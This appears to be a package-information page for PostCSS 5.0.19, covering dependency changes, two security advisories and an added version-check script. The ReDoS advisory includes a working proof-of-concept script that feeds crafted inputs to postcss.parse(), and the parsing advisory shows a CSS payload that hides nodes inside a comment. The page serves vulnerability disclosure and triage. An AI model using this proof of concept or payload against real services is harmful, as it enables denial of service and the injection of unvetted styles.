PostCSS version 5.0.19 is a minor release following 5.0.18 of the popular tool for transforming styles with JavaScript plugins. Both versions share the same runtime dependencies: js-base64, source-map, and supports-color, so the core functionality is unchanged. The differences lie in the development dependencies, which are tools used for building, testing, and linting the library itself rather than anything shipped to end users.
Specifically, postcss-parser-tests was bumped from version 5.0.5 to 5.0.6, indicating fixes or additions in the parser test suite. babel-core moved from version 6.5.2 to 6.6.0, and babel-preset-es2015 from 6.5.0 to 6.6.0; these Babel updates likely carry improvements in ES2015 transpilation. While these changes do not alter PostCSS's behaviour, they reflect ongoing maintenance of the development process and compatibility with current JavaScript tooling. For developers using PostCSS, upgrading to 5.0.19 brings whatever bug fixes and compatibility improvements went into that build, resulting in a slightly more robust and up-to-date build of the PostCSS library itself. The MIT license lets developers use and modify PostCSS freely.
All the vulnerabilities related to version 5.0.19 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
The proof of concept below times postcss.parse() on inputs of increasing length:

var postcss = require("postcss")

// Repeat the annotation prefix n times with no closing "*/", so the
// annotation regex has to backtrack across the whole input.
function build_attack(n) {
  var ret = "a{}"
  for (var i = 0; i < n; i++) {
    ret += "/*# sourceMappingURL="
  }
  return ret + "!";
}

// Warm-up parse of a well-formed source-map annotation.
postcss.parse('a{}/*# sourceMappingURL=a.css.map */')

// Parse inputs of growing length and log how long each parse takes.
for (var i = 1; i <= 500000; i++) {
  if (i % 1000 == 0) {
    var time = Date.now();
    var attack_str = build_attack(i)
    try {
      postcss.parse(attack_str)
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    } catch (e) {
      var time_cost = Date.now() - time;
      console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
    }
  }
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
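To triage an installed PostCSS against the two advisories above (the ReDoS in lib/previous-map.js and the \r parsing error), the following added example maps a version string onto the affected ranges quoted on this page. It is not PostCSS code; the function names and the inclusive reading of "between 8.0.0 and 8.2.13" are this example's assumptions.

```javascript
// Added example: which of the advisories listed on this page apply to a
// given postcss version. Ranges are taken from the advisory text; the
// inclusive reading of "between 8.0.0 and 8.2.13" is an assumption.

// Parse "MAJOR.MINOR.PATCH[-prerelease]" into three numbers; a leading "v"
// and any prerelease or build suffix are ignored.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)/.exec(String(v).trim());
  if (!m) throw new Error("unrecognised version: " + v);
  return m.slice(1, 4).map(Number);
}

// Numeric, field-by-field comparison: returns -1, 0 or 1.
function compareVersions(a, b) {
  const x = parseVersion(a);
  const y = parseVersion(b);
  for (let i = 0; i < 3; i++) {
    if (x[i] !== y[i]) return x[i] < y[i] ? -1 : 1;
  }
  return 0;
}

const lt = (v, limit) => compareVersions(v, limit) < 0;
const between = (v, lo, hi) =>
  compareVersions(v, lo) >= 0 && compareVersions(v, hi) <= 0;

// One entry per advisory on this page: an id and a predicate on the version.
const ADVISORIES = [
  {
    id: "ReDoS in lib/previous-map.js",
    affects: v => lt(v, "7.0.36") || between(v, "8.0.0", "8.2.13"),
  },
  {
    id: "line return (\\r) parsing error",
    affects: v => lt(v, "8.4.31"),
  },
];

// Returns the ids of the advisories that apply to the given version.
function affectedAdvisories(version) {
  return ADVISORIES.filter(a => a.affects(version)).map(a => a.id);
}

// Stand-alone run: report on the version this page is about.
const checked = "5.0.19";
console.log(checked + ": " + (affectedAdvisories(checked).join("; ") ||
  "not affected by the advisories listed here"));
```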